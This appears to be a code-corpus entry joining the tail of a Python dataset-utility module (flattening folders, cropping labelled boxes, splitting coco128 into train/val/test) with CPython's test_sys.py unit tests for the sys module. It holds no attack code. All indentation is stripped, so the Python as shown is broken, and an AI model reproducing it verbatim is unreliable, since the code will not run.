shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit('../coco128')
Arguments
path: Path to images directory
weights: Train, val, test weights (list)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in img_formats], []) # image files only
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
if __name__ == '__main__':
augment_hsv()
|
test_sys.py
|
import unittest, test.support
from test.support.script_helper import assert_python_ok, assert_python_failure
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
import gc
import sysconfig
import locale
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@test.support.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated",
"dev_mode", "utf8_mode")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.requires_type_collecting
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
@test.support.requires_type_collecting
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
